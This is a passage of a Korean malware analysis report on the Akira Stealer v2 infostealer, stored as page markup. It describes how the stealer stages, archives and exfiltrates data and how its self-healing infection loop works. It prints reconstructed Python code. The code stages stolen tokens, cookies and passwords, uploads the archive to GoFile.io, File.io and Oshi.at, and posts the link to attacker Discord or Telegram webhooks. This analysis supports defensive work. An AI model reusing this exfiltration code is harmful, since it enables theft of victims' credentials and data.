보장합니다.",[615,9983,9985],{"className":4515,"code":9984,"language":4517,"meta":530,"style":530},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[578,9986,9987,9992,9997,10002,10007,10012,10017,10022,10027,10032],{"__ignoreMap":530},[1706,9988,9989],{"class":1708,"line":1709},[1706,9990,9991],{},"import os, shutil\n",[1706,9993,9994],{"class":1708,"line":531},[1706,9995,9996],{},"# Constants\n",[1706,9998,9999],{"class":1708,"line":2091},[1706,10000,10001],{},"TMP = os.getenv('TEMP')\n",[1706,10003,10004],{"class":1708,"line":2097},[1706,10005,10006],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[1706,10008,10009],{"class":1708,"line":2419},[1706,10010,10011],{},"# Prepare structure\n",[1706,10013,10014],{"class":1708,"line":2425},[1706,10015,10016],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[1706,10018,10019],{"class":1708,"line":3081},[1706,10020,10021],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[1706,10023,10024],{"class":1708,"line":3874},[1706,10025,10026],{},"# Save token\n",[1706,10028,10029],{"class":1708,"line":3880},[1706,10030,10031],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[1706,10033,10034],{"class":1708,"line":4129},[1706,10035,10036],{},"    f.write(token)\n",[630,10038,10039,10042],{},[633,10040,10041],{},"빠른 검사를 위해 토큰은 별도의 작은 텍스트 파일에 저장됩니다.",[633,10043,10044,10047,10048,10051],{},[578,10045,10046],{},"Chromium.GetCookies()","에서 나온 쿠키 덤프는 ",[578,10049,10050],{},"{Browser}_Cookies.txt","에 기록됩니다.",[888,10053,10055],{"id":10054},"_7133-zip-아카이브-생성","7.13.3 ZIP 아카이브 생성",[526,10057,894],{},[526,10059,10060,10061],{},"스테이징이 완료되면, Akira는 전체 디렉터리를 단일 ZIP 아카이브로 압축합니다. 아카이브 파일명은 일관된 명명 규칙을 따릅니다. ",[10062,10063,10064,10065],"computer-name",{},"_",[10066,10067,10068],"timestamp",{},".zip으로, 호스트의 머신 이름과 ISO 8601 형식의 UTC 타임스탬프를 사용합니다. 이는 고유성과 시간순 추적성을 모두 보장합니다. 전체 스테이징 디렉터리를 재귀적으로 순회함으로써, 모든 파일이 ZIP 내에서 상대 구조로 보존됩니다. 이 형식은 특히 수백 명의 피해자가 병렬로 침해되는 경우, 공격자의 대량 회수와 검사를 단순화합니다.",[615,10070,10072],{"className":4515,"code":10071,"language":4517,"meta":530,"style":530},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[578,10073,10074,10079,10083,10088,10093,10098,10103,10108,10113,10118,10123,10128,10133],{"__ignoreMap":530},[1706,10075,10076],{"class":1708,"line":1709},[1706,10077,10078],{},"import zipfile, datetime\n",[1706,10080,10081],{"class":1708,"line":531},[1706,10082,3871],{"emptyLinePlaceholder":325},[1706,10084,10085],{"class":1708,"line":2091},[1706,10086,10087],{},"def create_archive(root_dir: str) -> str:\n",[1706,10089,10090],{"class":1708,"line":2097},[1706,10091,10092],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[1706,10094,10095],{"class":1708,"line":2419},[1706,10096,10097],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[1706,10099,10100],{"class":1708,"line":2425},[1706,10101,10102],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[1706,10104,10105],{"class":1708,"line":3081},[1706,10106,10107],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[1706,10109,10110],{"class":1708,"line":3874},[1706,10111,10112],{},"        for dirpath, _, files in os.walk(root_dir):\n",[1706,10114,10115],{"class":1708,"line":3880},[1706,10116,10117],{},"            for fname in files:\n",[1706,10119,10120],{"class":1708,"line":4129},[1706,10121,10122],{},"                full = os.path.join(dirpath, fname)\n",[1706,10124,10125],{"class":1708,"line":5054},[1706,10126,10127],{},"                rel = os.path.relpath(full, root_dir)\n",[1706,10129,10130],{"class":1708,"line":5060},[1706,10131,10132],{},"                zf.write(full, rel)\n",[1706,10134,10135],{"class":1708,"line":5066},[1706,10136,10137],{},"    return zip_path\n",[630,10139,10140],{},[633,10141,10142,10143,10146],{},"호스트 일관성을 위해 아카이브는 ",[578,10144,10145],{},"DESKTOP1234_20250505T123456Z.zip","으로 명명됩니다.",[526,10148,10149],{},[567,10150,10151],{},"ZIP 파일명 규칙",[526,10153,10154],{},"아카이브는 침해된 호스트의 컴퓨터 이름 뒤에 ISO 형식의 UTC 타임스탬프를 붙여 명명되어, 고유성과 시간순을 보장합니다.",[615,10156,10158],{"className":4515,"code":10157,"language":4517,"meta":530,"style":530},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[578,10159,10160,10165,10169,10173,10178,10182,10187,10191,10195],{"__ignoreMap":530},[1706,10161,10162],{"class":1708,"line":1709},[1706,10163,10164],{},"import datetime, os\n",[1706,10166,10167],{"class":1708,"line":531},[1706,10168,3871],{"emptyLinePlaceholder":325},[1706,10170,10171],{"class":1708,"line":2091},[1706,10172,10087],{},[1706,10174,10175],{"class":1708,"line":2097},[1706,10176,10177],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[1706,10179,10180],{"class":1708,"line":2419},[1706,10181,10092],{},[1706,10183,10184],{"class":1708,"line":2425},[1706,10185,10186],{},"    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[1706,10188,10189],{"class":1708,"line":3081},[1706,10190,10097],{},[1706,10192,10193],{"class":1708,"line":3874},[1706,10194,10102],{},[1706,10196,10197],{"class":1708,"line":3880},[1706,10198,10137],{},[526,10200,10154],{},[888,10202,10204],{"id":10203},"_7144-업로드-워크플로","7.14.4 업로드 워크플로",[526,10206,894],{},[526,10208,10209],{},"Akira는 데이터 유출 성공 가능성을 극대화하기 위해 3계층 업로드 전략을 사용합니다. 먼저 GoFile.io의 퍼블릭 API를 사용해 아카이브를 업로드하려 시도하며, 이는 다운로드 링크를 반환합니다. GoFile을 사용할 수 없거나 차단된 경우, File.io로, 그다음 Oshi.at으로 되돌아가 데이터가 항상 전송되도록 보장합니다. 이 서비스들은 익명의 단기 호스팅을 제공하여, 테이크다운과 추적을 어렵게 만듭니다. 스크립트는 최종 다운로드 URL을 캡처하여 웹훅 전달을 위해 준비합니다.",[2105,10211,10212,10244,10272],{},[633,10213,10214,10217],{},[567,10215,10216],{},"기본: GoFile.io",[630,10218,10219,10227,10235],{},[633,10220,10221,1001,10224],{},[567,10222,10223],{},"서버를 가져오는 API",[578,10225,10226],{},"GET https://api.gofile.io/servers",[633,10228,10229,1001,10232],{},[567,10230,10231],{},"업로드 엔드포인트",[578,10233,10234],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[633,10236,10237,1001,10240,10243],{},[567,10238,10239],{},"응답 필드",[578,10241,10242],{},"data.downloadPage","에 최종 URL이 담깁니다.",[633,10245,10246,10249],{},[567,10247,10248],{},"대체 #1: File.io",[630,10250,10251,10262],{},[633,10252,10253,1001,10255,646,10258,10261],{},[567,10254,10231],{},[578,10256,10257],{},"POST https://file.io/",[578,10259,10260],{},"files={'file': open(...)}"," 사용",[633,10263,10264,10267,10268,10271],{},[567,10265,10266],{},"응답",": JSON ",[578,10269,10270],{},"link"," 필드.",[633,10273,10274,10277],{},[567,10275,10276],{},"대체 #2: Oshi.at",[630,10278,10279,10294],{},[633,10280,10281,1001,10283,646,10286,10289,10290,10293],{},[567,10282,10231],{},[578,10284,10285],{},"POST http://oshi.at/",[578,10287,10288],{},"files[]","와 매개변수 ",[578,10291,10292],{},"expire=43200, autodestroy=0"," 사용.",[633,10295,10296,1001,10298,10301],{},[567,10297,10266],{},[578,10299,10300],{},"DL: \u003Curl>","을 담은 평문.",[526,10303,10304],{},[567,10305,10306],{},"구현 스니펫:",[615,10308,10310],{"className":4515,"code":10309,"language":4517,"meta":530,"style":530},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[578,10311,10312,10317,10321,10326,10331,10335,10340,10345,10350,10355,10360,10365,10370,10375,10380,10385,10390,10394,10399,10404,10408,10413,10417,10422,10427,10431],{"__ignoreMap":530},[1706,10313,10314],{"class":1708,"line":1709},[1706,10315,10316],{},"import requests\n",[1706,10318,10319],{"class":1708,"line":531},[1706,10320,3871],{"emptyLinePlaceholder":325},[1706,10322,10323],{"class":1708,"line":2091},[1706,10324,10325],{},"def upload_with_fallback(zip_path):\n",[1706,10327,10328],{"class":1708,"line":2097},[1706,10329,10330],{},"    # GoFile\n",[1706,10332,10333],{"class":1708,"line":2419},[1706,10334,5169],{},[1706,10336,10337],{"class":1708,"line":2425},[1706,10338,10339],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[1706,10341,10342],{"class":1708,"line":3081},[1706,10343,10344],{},"        for srv in servers:\n",[1706,10346,10347],{"class":1708,"line":3874},[1706,10348,10349],{},"            try:\n",[1706,10351,10352],{"class":1708,"line":3880},[1706,10353,10354],{},"                r = requests.post(\n",[1706,10356,10357],{"class":1708,"line":4129},[1706,10358,10359],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[1706,10361,10362],{"class":1708,"line":5054},[1706,10363,10364],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[1706,10366,10367],{"class":1708,"line":5060},[1706,10368,10369],{},"                url = r.json()['data']['downloadPage']\n",[1706,10371,10372],{"class":1708,"line":5066},[1706,10373,10374],{},"                if url: return url\n",[1706,10376,10377],{"class":1708,"line":5072},[1706,10378,10379],{},"            except: continue\n",[1706,10381,10382],{"class":1708,"line":5078},[1706,10383,10384],{},"    except: pass\n",[1706,10386,10387],{"class":1708,"line":5084},[1706,10388,10389],{},"    # File.io\n",[1706,10391,10392],{"class":1708,"line":5090},[1706,10393,5169],{},[1706,10395,10396],{"class":1708,"line":5096},[1706,10397,10398],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[1706,10400,10401],{"class":1708,"line":5102},[1706,10402,10403],{},"        return r.json().get('link','')\n",[1706,10405,10406],{"class":1708,"line":5108},[1706,10407,10384],{},[1706,10409,10410],{"class":1708,"line":5114},[1706,10411,10412],{},"    # Oshi.at\n",[1706,10414,10415],{"class":1708,"line":5120},[1706,10416,5169],{},[1706,10418,10419],{"class":1708,"line":5126},[1706,10420,10421],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[1706,10423,10424],{"class":1708,"line":5132},[1706,10425,10426],{},"        return text.split('DL: ')[1].strip()\n",[1706,10428,10429],{"class":1708,"line":5138},[1706,10430,10384],{},[1706,10432,10433],{"class":1708,"line":5804},[1706,10434,10435],{},"    return ''\n",[888,10437,10439],{"id":10438},"_7155-웹훅-알림-공격자-회수-및-분석가-가시성-한계","7.15.5 웹훅 알림, 공격자 회수 및 분석가 가시성 한계",[526,10441,894],{},[526,10443,10444],{},"ZIP 아카이브를 업로드한 후, Akira는 웹훅 알림(일반적으로 Discord 또는 Telegram으로)을 전송하며, 탈취된 토큰 수, 쿠키 수, 파일 크기, 클릭 가능한 다운로드 링크 같은 상세 정보를 담은 구조화된 임베드를 포함합니다. 이는 공격자에게 즉각적인 피드백과 회수 접근을 제공합니다. 신뢰성을 보장하기 위해, 아카이브 링크만 담은 평문 대체 메시지도 전송됩니다. 이 이중화는 임베드가 플랫폼에 의해 차단되거나 필터링되더라도 전달을 보장합니다. 방어자의 관점에서, 이러한 통신은 아웃바운드 네트워크 모니터링이 갖춰져 있지 않는 한 종종 보이지 않습니다.",[526,10446,10447],{},[567,10448,10449],{},"임베드 알림",[615,10451,10453],{"className":4515,"code":10452,"language":4517,"meta":530,"style":530},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[578,10454,10455,10460,10465,10470,10475,10480,10485,10490,10495,10499,10504,10509,10514,10518],{"__ignoreMap":530},[1706,10456,10457],{"class":1708,"line":1709},[1706,10458,10459],{},"# Build embed with key metadata\n",[1706,10461,10462],{"class":1708,"line":531},[1706,10463,10464],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[1706,10466,10467],{"class":1708,"line":2091},[1706,10468,10469],{},"fields = [\n",[1706,10471,10472],{"class":1708,"line":2097},[1706,10473,10474],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[1706,10476,10477],{"class":1708,"line":2419},[1706,10478,10479],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[1706,10481,10482],{"class":1708,"line":2425},[1706,10483,10484],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[1706,10486,10487],{"class":1708,"line":3081},[1706,10488,10489],{},"    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[1706,10491,10492],{"class":1708,"line":3874},[1706,10493,10494],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[1706,10496,10497],{"class":1708,"line":3880},[1706,10498,7947],{},[1706,10500,10501],{"class":1708,"line":4129},[1706,10502,10503],{},"payload = {\n",[1706,10505,10506],{"class":1708,"line":5054},[1706,10507,10508],{},"    'username':'Akira 💊',\n",[1706,10510,10511],{"class":1708,"line":5060},[1706,10512,10513],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[1706,10515,10516],{"class":1708,"line":5066},[1706,10517,2428],{},[1706,10519,10520],{"class":1708,"line":5072},[1706,10521,10522],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[630,10524,10525,10531],{},[633,10526,10527,10530],{},[567,10528,10529],{},"전달",": 공격자의 Discord/Telegram 채널로 전송됩니다.",[633,10532,10533,10536,10537,10540],{},[567,10534,10535],{},"임베드 링크",": GoFile(또는 대체 호스트)의 ZIP을 가리키는 클릭 가능한 ",[578,10538,10539],{},"download_url","을 담습니다.",[526,10542,10543],{},[567,10544,10545],{},"원시 링크 대체",[615,10547,10549],{"className":4515,"code":10548,"language":4517,"meta":530,"style":530},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[578,10550,10551,10556,10561],{"__ignoreMap":530},[1706,10552,10553],{"class":1708,"line":1709},[1706,10554,10555],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[1706,10557,10558],{"class":1708,"line":531},[1706,10559,10560],{},"message = f\"📥 Archive available at: {download_url}\"\n",[1706,10562,10563],{"class":1708,"line":2091},[1706,10564,10565],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[630,10567,10568],{},[633,10569,10570,10573],{},[567,10571,10572],{},"평문",": 임베드가 차단되거나 조용히 폐기될 경우를 대비해 링크 전달을 보장합니다.",[526,10575,10576],{},[567,10577,10578],{},"공격자가 링크를 회수하는 방법",[526,10580,10581,10584],{},[567,10582,10583],{},"1. 웹훅 인프라","\n공격자는 멀웨어 구성에 웹훅 엔드포인트를 삽입합니다:",[615,10586,10588],{"className":4515,"code":10587,"language":4517,"meta":530,"style":530},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[578,10589,10590,10595],{"__ignoreMap":530},[1706,10591,10592],{"class":1708,"line":1709},[1706,10593,10594],{},"# at class initialization\n",[1706,10596,10597],{"class":1708,"line":531},[1706,10598,10599],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[630,10601,10602,10609],{},[633,10603,10604,1001,10606],{},[567,10605,1344],{},[578,10607,10608],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[633,10610,10611,1001,10614],{},[567,10612,10613],{},"Telegram",[578,10615,10616],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[526,10618,10619,10622],{},[567,10620,10621],{},"2. 실시간 전달","\n파일 업로드 성공 직후, 멀웨어는 다음을 실행합니다:",[615,10624,10626],{"className":4515,"code":10625,"language":4517,"meta":530,"style":530},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[578,10627,10628,10632,10637,10642,10647,10652,10657,10662,10667,10671,10676],{"__ignoreMap":530},[1706,10629,10630],{"class":1708,"line":1709},[1706,10631,10503],{},[1706,10633,10634],{"class":1708,"line":531},[1706,10635,10636],{},"  'username': 'Akira 💊',\n",[1706,10638,10639],{"class":1708,"line":2091},[1706,10640,10641],{},"  'embeds': [{\n",[1706,10643,10644],{"class":1708,"line":2097},[1706,10645,10646],{},"      'title': '🗄️ Exfiltration Complete',\n",[1706,10648,10649],{"class":1708,"line":2419},[1706,10650,10651],{},"      'fields': [\n",[1706,10653,10654],{"class":1708,"line":2425},[1706,10655,10656],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[1706,10658,10659],{"class":1708,"line":3081},[1706,10660,10661],{},"      ]\n",[1706,10663,10664],{"class":1708,"line":3874},[1706,10665,10666],{},"  }]\n",[1706,10668,10669],{"class":1708,"line":3880},[1706,10670,2428],{},[1706,10672,10673],{"class":1708,"line":4129},[1706,10674,10675],{},"# Transmit the archive URL entirely in the JSON body\n",[1706,10677,10678],{"class":1708,"line":5054},[1706,10679,10680],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[630,10682,10683,10692],{},[633,10684,10685,10687,10688,10691],{},[578,10686,10539],{}," 변수가 임베드의 ",[578,10689,10690],{},"fields.value","에 보간됩니다.",[633,10693,10694,10695,10697,10698,10701],{},"Telegram 대체의 경우, ",[578,10696,10539],{},"이 평문 ",[578,10699,10700],{},"message"," 매개변수에 나타납니다.",[526,10703,10704],{},[567,10705,10706],{},"3. EDR 및 포렌식 가시성 한계",[630,10708,10709,10718],{},[633,10710,10711,10714,10715,10717],{},[567,10712,10713],{},"로컬 로깅 없음",": 멀웨어는 ",[578,10716,10539],{},"을 디스크나 시스템 로그에 기록하지 않습니다.",[633,10719,10720,10723],{},[567,10721,10722],{},"EDR 사각지대",": Microsoft Defender for Endpoint 같은 도구는 HTTP 요청 시도를 플래그할 수 있지만 삽입된 URL을 추출할 수는 없습니다.",[526,10725,10726],{},[567,10727,10728],{},"4. 분석가가 이를 로컬에서 복구할 수 없는 이유:",[630,10730,10731,10742,10762],{},[633,10732,10733,10714,10736,10738,10739,2147],{},[567,10734,10735],{},"링크의 로컬 사본 없음",[578,10737,10539],{},"을 메모리에만 기록하고 네트워크를 통해 전송합니다. 이 URL을 디스크나 로그에 저장하지 ",[4652,10740,10741],{},"않습니다",[633,10743,10744,10747,10748,10750,10755,10756,10758,10761],{},[567,10745,10746],{},"일시적 스테이징 정리",": 업로드 직후, 코드는 다음을 실행합니다:",[723,10749],{},[1706,10751,10754],{"className":10752},[10753],"text-monospace","shutil.rmtree(ROOT)",",",[723,10757],{},[578,10759,10760],{},"%TEMP%","에서 스테이징된 모든 아티팩트(모든 임시 텍스트 파일 포함)를 지웁니다.",[633,10763,10764,10767,10768,10771],{},[567,10765,10766],{},"네트워크 전용 전송",": 웹훅 호출(",[578,10769,10770],{},"requests.post",")은 메모리에서 발생합니다. 피해자 머신에는 HTTP 로그나 브라우저 기록 항목이 생성되지 않습니다.",[847,10773,10774],{},[526,10775,10776,10779,10780,10782,10783,10785],{},[567,10777,10778],{},"분석가에 대한 함의:","\n실행 시점에 라이브 패킷 캡처(예: 네트워크 TAP 또는 프록시)가 없으면, 정확한 ",[578,10781,10539],{},"은 감염 후 복구 불가능합니다.\n또한 유출된 아카이브는 호스팅 서비스에서 자동 삭제되어, 포렌식 회수의 여지를 더욱 줄입니다.\n감염 후 이미징이나 호스트 기반 포렌식 복구로도 공격자의 URL이나 파일 호스트 자격 증명은 드러나지 ",[4652,10784,10741],{},". 로컬에 아티팩트가 남아 있지 않기 때문입니다.",[853,10787],{"className":10788},[856,857],[740,10790,10792],{"id":10791},"_713-결론","7.13 결론",[526,10794,746],{},[526,10796,10797,10799],{},[578,10798,612],{},"(Akira Stealer v2)는 포괄적이고 상업적으로 배포되는 스틸러 툴킷입니다. 광범위한 표적화, 정교한 분석 방해, 동적 인프라 제어, 그리고 자격 증명, 암호화폐, 시스템 프로파일링, 사용자 파일 전반에 걸친 풀스택 데이터 탈취를 결합합니다. 그 모듈성과 은닉성은 신속한 재감염 방법과 결합되어, 실제 활동 중 관찰된 스틸러 중 기술적으로 가장 발전된 것 중 하나로 만듭니다.",[557,10801,10803],{"id":10802},"_8-순환-실행-체인-자가-치유-루프","8. 순환 실행 체인: 자가 치유 루프",[526,10805,562],{},[526,10807,10808,10809,10812],{},"이 캠페인에서 기술적으로 가장 정교한 요소 중 하나는 그 재생적이고 순환적인 실행 모델입니다. 드로퍼에서 페이로드로 흐른 뒤 사라지는 선형 단계를 가진 기존 멀웨어와 달리, 이 작전은 모든 구성 요소가 서로를 감시하는 ",[567,10810,10811],{},"폐쇄 루프","처럼 설계되었습니다.",[526,10814,4688,10815,10818],{},[567,10816,10817],{},"자가 치유 아키텍처","는 감염 체인을 지속적일 뿐만 아니라 자율적으로 만들었습니다. 부분적 제거로부터 완전히 복구할 수 있었습니다. 한 조각이라도 살아 있는 한, 전체 멀웨어 생태계는 스스로를 재조립할 수 있었습니다.",[740,10820,10822],{"id":10821},"_81-행위-분해","8.1 행위 분해",[526,10824,746],{},[2105,10826,10827,10853,10866,10895,10912],{},[633,10828,10829,10834,10836,10837,10840,10841,10843,10844,10846,10847,10849,10850,10852],{},[567,10830,10831,10832,2040],{},"지속성 앵커(",[578,10833,601],{},[578,10835,601],{},"는 기초적인 발판 역할을 합니다. 일반적으로 ",[578,10838,10839],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"," 같은 Windows 사용자 시작 위치에 드롭되거나 ",[578,10842,1678],{},"을 통해 등록됩니다. 그 임무는 단순하지만 중요합니다. ",[578,10845,605],{},"가 존재하도록 보장하고 사용자 로그온 중 이를 조용히 실행하는 것입니다. ",[578,10848,605],{},"가 없으면, 아카이브 ",[578,10851,1846],{},"(임시 폴더에 위치하거나 새로 드롭됨)를 다시 추출하여 전체 Electron 앱 구조를 재생성합니다.",[633,10854,10855,10860,10862,10863,10865],{},[567,10856,10857,10858,2040],{},"브리지 로더(",[578,10859,605],{},[578,10861,605],{},"는 Electron으로 래핑된 Node.js 애플리케이션입니다. 어떤 GUI도 노출하지 않고 완전히 백그라운드에서 작동합니다. 실행 시, Node.js를 런타임 환경으로 사용하여 ",[578,10864,1075],{}," 내에 삽입된 JavaScript 로직을 실행합니다. 이 추상화 계층은 핵심 로직을 PE 스텁에서 분리하여 전통적인 분석을 회피하는 데 도움을 줍니다.",[633,10867,10868,10873,10875,10876],{},[567,10869,10870,10871,2040],{},"실행 오케스트레이터(",[578,10872,2830],{},[578,10874,1075],{}," 안에 삽입된 이것이 감염 체인의 진정한 컨트롤러입니다. 그 핵심 기능은 다음과 같습니다:",[630,10877,10878,10883,10886],{},[633,10879,10880,10882],{},[578,10881,601],{},"의 존재를 확인하고 없으면 재배포",[633,10884,10885],{},"런타임 구성을 동적으로 주입: 웹훅 URL, C2 주소, 토큰",[633,10887,10888,10889,10891,10892,10894],{},"이미 존재하는 Python 페이로드(",[578,10890,612],{},")를 호출하거나, 공격자가 통제하는 인프라에서 ZIP 번들(예: ",[578,10893,2895],{},")의 일부로 이를 다운로드",[633,10896,10897,10902,10903,1565,10905,10907,10908,10911],{},[567,10898,10899,10900,2040],{},"페이로드 실행(",[578,10901,612],{},"\n트리거되면, ",[578,10904,612],{},[578,10906,580],{},"를 통해 메모리에서 실행됩니다. 저장된 자격 증명, 쿠키, Discord 토큰, 브라우저 세션 데이터, 암호화폐 지갑 확장을 체계적으로 수집합니다. 데이터는 ZIP 아카이브에 스테이징되어 HTTPS를 통해 유출됩니다. 일반적으로 Discord 웹훅으로 향하지만, ",[578,10909,10910],{},"gofile.io"," 같은 대체 API나 맞춤 C2 엔드포인트도 관찰되었습니다.",[633,10913,10914,10917,10918,10920,10921,10923,10924,1292,10926,10928,10929,10931],{},[567,10915,10916],{},"루프 무결성 및 자가 치유","\n설계는 순환적입니다. ",[578,10919,601],{},"가 삭제되면 재배포됩니다. ",[578,10922,605],{},"가 없으면 ",[578,10925,601],{},[578,10927,1846],{},"에서 이를 다시 추출합니다. ",[578,10930,612],{},"가 삭제되면 JavaScript 계층이 이를 다시 확보합니다. 이 상호 의존성은 멀웨어를 복원력 있게 만들고, 사실상 살아남은 어떤 조각으로부터도 실행 체인을 재구성할 수 있게 합니다.",[526,10933,10934,10935,10938],{},"이 아키텍처는 단지 모듈형인 것이 아니라 ",[567,10936,10937],{},"자기 지속적","이며, 표적 환경에서의 은닉성, 유연성, 장기 생존성을 위해 의도적으로 설계되었습니다.",[740,10940,10942],{"id":10941},"_82-이것이-주목할-만한-이유","8.2 이것이 주목할 만한 이유",[526,10944,746],{},[526,10946,10947,10948,10951],{},"이 캠페인의 아키텍처 설계는 상용 인포스틸러에서 일반적으로 보이지 않는 수준의 정교함을 반영합니다. 단순한 다단계 로더를 넘어, 이는 ",[567,10949,10950],{},"운영 복원력, 은닉성, 자동화","를 위해 설계된 멀웨어입니다.",[526,10953,10954],{},[567,10955,10956],{},"핵심 특성",[630,10958,10959,10965,11002,11022],{},[633,10960,10961,10964],{},[567,10962,10963],{},"완전한 자율성","\n일단 배포되면, 멀웨어는 사용자 상호작용이나 외부 재활성화가 필요 없습니다. 악성 마이크로서비스처럼 작동하며, 외부 통제 없이 자신의 지속성, 페이로드 실행, 복구 루틴을 스스로 오케스트레이션합니다.",[633,10966,10967,10970,10971],{},[567,10968,10969],{},"다중 언어 실행 스택","\n이 툴체인은 다음을 통합합니다:",[630,10972,10973,10982,10988,10994],{},[633,10974,10975,3219,10978,646,10980,2040],{},[567,10976,10977],{},"PE 바이너리",[578,10979,601],{},[578,10981,605],{},[633,10983,10984,10987],{},[567,10985,10986],{},"Node.js / JavaScript","(Electron을 통해)",[633,10989,10990,10993],{},[567,10991,10992],{},"PowerShell","(난독화된 페이로드 릴레이에 사용)",[633,10995,10996,3219,10999,11001],{},[567,10997,10998],{},"Python",[578,11000,612],{},", 메모리 상주 스틸러로 실행)\n이 계층화된 구성은 전통적인 정적 도구로 프로파일링하고, 지문 채취하고, 분석하기 더 어렵게 만듭니다.",[633,11003,11004,11007,11008],{},[567,11005,11006],{},"설계에 의한 방어 회피","\n모든 구성 요소가 인코딩되거나, 암호화되거나, 동적으로 주입됩니다:",[630,11009,11010,11013,11016,11019],{},[633,11011,11012],{},"Base64 PowerShell 릴레이",[633,11014,11015],{},"AES 암호화 및 GZIP 압축된 Python 코어",[633,11017,11018],{},"런타임 토큰 주입이 있는 난독화된 JavaScript",[633,11020,11021],{},"부분적 제거를 좌절시키는 자가 치유 동작",[633,11023,11024,11027,11028,11031,11032,11034,11035,11037],{},[567,11025,11026],{},"단일 장애점 없음","\n멀웨어의 자가 복구 로직은 